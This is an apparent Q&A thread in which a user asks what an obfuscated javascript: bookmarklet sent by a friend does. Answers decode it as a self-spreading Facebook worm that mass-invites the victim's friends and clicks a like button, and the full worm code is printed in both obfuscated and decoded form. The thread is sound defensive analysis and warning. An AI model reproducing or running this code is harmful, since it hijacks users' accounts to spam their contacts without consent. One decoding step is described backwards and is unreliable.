
What does this code do

OK, someone who happens to be a good friend of mine has been sending me some odd emails lately, one of which was a link to a page that asks you to copy and paste this into the address bar of your browser and then execute it ...

javascript:(function(){a='app125879300771588_jop';b='app125879300771588_jode';ifc='app125879300771588_ifc';ifo='app125879300771588_ifo';mw='app125879300771588_mwrapper';var _0xc100=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]]=_0xc100[3];d[_0xc100[2]](a)[_0xc100[4]]=d[_0xc100[2]](b)[_0xc100[5]];d[_0xc100[2]](_0xc100[7])[_0xc100[6]]();setTimeout(function (){fs[_0xc100[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xc100[11]](_0xc100[9],_0xc100[10]);} ,5000);setTimeout(function (){d[_0xc100[2]](_0xc100[12])[_0xc100[6]]();d[_0xc100[2]](ifo)[_0xc100[4]]=d[_0xc100[2]](ifc)[_0xc100[5]];} ,5000);})();

Not being totally with it when it comes to low-level programming, I'm curious as to what the email is asking here ...

PLEASE DO NOT RUN THIS CODE UNLESS YOU ARE HAPPY THAT IT WILL NOT BREAK ANYTHING.

But ... Could someone tell me what it does?

a = 'app125879300771588_jop';
b = 'app125879300771588_jode';
ifc = 'app125879300771588_ifc';
ifo = 'app125879300771588_ifo';
mw = 'app125879300771588_mwrapper';
var _0xc100 = ["visibility", "style", "getElementById", "hidden", "innerHTML", "value", "click", "suggest", "select_all", "sgm_invite_form", "/ajax/social_graph/invite_dialog.php", "submitDialog", "likeme"];
d = document;
d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]] = _0xc100[3];
d[_0xc100[2]](a)[_0xc100[4]] = d[_0xc100[2]](b)[_0xc100[5]];
d[_0xc100[2]](_0xc100[7])[_0xc100[6]]();
setTimeout(function () {
    fs[_0xc100[8]]();
}, 5000);
setTimeout(function () {
    SocialGraphManager[_0xc100[11]](_0xc100[9], _0xc100[10]);
}, 5000);
setTimeout(function () {
    d[_0xc100[2]](_0xc100[12])[_0xc100[6]]();
    d[_0xc100[2]](ifo)[_0xc100[4]] = d[_0xc100[2]](ifc)[_0xc100[5]];
}, 5000);

This is most likely an adaptation of one of many Facebook worms that sends itself to all of your friends.

Look here for a similar question.

Other versions of this used packer to obfuscate, and these could easily be deobfuscated by running the packer code through http://jsbeautifier.org/

I haven't completely decoded the code, but here are a couple of hints about it.

The variable _0xc100 defines an array of strings. The characters are encoded as hexadecimal, so it's more difficult to read them. So, for instance, \x76 equals "v".

You can safely alert(_0xc100); to see it in plain text.

var _0xc100 = ["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79", 
      "\x73\x74\x79\x6C\x65", 
      "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",
      "\x68\x69\x64\x64\x65\x6E",
      "\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",
      "\x76\x61\x6C\x75\x65",
      "\x63\x6C\x69\x63\x6B",
      "\x73\x75\x67\x67\x65\x73\x74",
      "\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C",
      "\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D",
      "\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70",
      "\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67",
      "\x6C\x69\x6B\x65\x6D\x65"];

translates to an array containing these keywords

visibility, style, getElementById, hidden, innerHTML, value, click, suggest, select_all,
sgm_invite_form, /ajax/social_graph/invite_dialog.php, submitDialog, likeme

Now, the following statements (DON'T EXECUTE THOSE) use these keywords to actually execute functions.

For instance:

d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]] = _0xc100[3];

is equivalent to (d is defined as document and mw is defined at the top)

document.getElementById("app125879300771588_mwrapper").style.visibility = "hidden";

which hides an element called app125879300771588_mwrapper

the following instructions give

document.getElementById("app125879300771588_jop").innerHTML = document.getElementById("app125879300771588_jode").value;

which copies the content of app125879300771588_jop into app125879300771588_jode

and

document.getElementById("suggest").click();

which I guess clicks some "suggest" button.

Finally, it sets 3 setTimeout functions, to execute 3 commands after 5 seconds (the 5000)

They translate to

setTimeout(function () {
    // fs[_0xc100[8]]() in the original: the call is made on the page's fs object
    fs.select_all();
}, 5000);

Which I assume selects all your friends...

setTimeout(function () {
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);

... send them invites

setTimeout(function () {
    document.getElementById("likeme").click();
    document.getElementById("app125879300771588_ifo").innerHTML =
        document.getElementById("app125879300771588_ifc").value;
}, 5000);

... and presses a like button

Note that I don't use Facebook, and I don't know the ins and outs of it but I guess it's pretty clear that this code is malicious.
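The manual decoding walked through above can be done statically, without pasting anything into a browser. The following is an added example, not part of the original answers: it treats the snippet as inert text, decodes the `\xNN` string table, and rewrites the `_0xc100[n]` lookups into readable property names and literals. The function names are hypothetical, and SAMPLE is a shortened excerpt of the snippet from the question.

```javascript
// Added example: static decoding only. The sample is held as inert text and never evaluated.
// SAMPLE is a shortened excerpt of the snippet in the question (first four table entries).
const SAMPLE = String.raw`var _0xc100=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E"];d=document;d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]]=_0xc100[3];`;

// Turn the text "\x76" (backslash, x, two hex digits) into the character it encodes.
function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9A-Fa-f]{2})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Locate `var _0x....=[ "...", ... ]` and decode each string literal in it.
// Assumes no "]" occurs inside the table's strings (true for the snippet above).
function extractStringTable(src) {
  const m = /var\s+(_0x[0-9a-f]+)\s*=\s*\[([^\]]*)\]/i.exec(src);
  if (!m) return null;
  const entries = [];
  const literal = /"((?:[^"\\]|\\.)*)"/g;
  let hit;
  while ((hit = literal.exec(m[2])) !== null) entries.push(decodeHexEscapes(hit[1]));
  return { name: m[1], decl: m[0], entries };
}

function deobfuscate(src) {
  const table = extractStringTable(src);
  if (!table) return src; // nothing recognisable to decode
  const { name, decl, entries } = table;
  const isIdent = (s) => /^[A-Za-z_$][\w$]*$/.test(s);
  // obj[_0xc100[2]] -> obj.getElementById (only when it follows an expression)
  const propAccess = new RegExp("(?<=[\\w$)\\]])\\[" + name + "\\[(\\d+)\\]\\]", "g");
  // any remaining _0xc100[3] -> "hidden"
  const lookup = new RegExp("(?<![\\w$])" + name + "\\[(\\d+)\\]", "g");
  const inRange = (i) => Number(i) < entries.length;
  return src
    .replace(propAccess, (all, i) => (inRange(i) && isIdent(entries[i]) ? "." + entries[i] : all))
    .replace(lookup, (all, i) => (inRange(i) ? JSON.stringify(entries[i]) : all))
    .replace(decl, () => `var ${name} = ${JSON.stringify(entries)}`);
}

console.log(deobfuscate(SAMPLE));
```

Out-of-range indexes and non-identifier entries (such as the URL path in the full table) are left in bracket form rather than guessed at.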

It's an obfuscated bookmarklet. You can unobfuscate it (carefully) to see the actual JavaScript it will run. If you don't have a powerful need to, though, it's probably not worth bothering. I'd bin it and check with my friend to see if it really is coming from him/her, and if so, why.
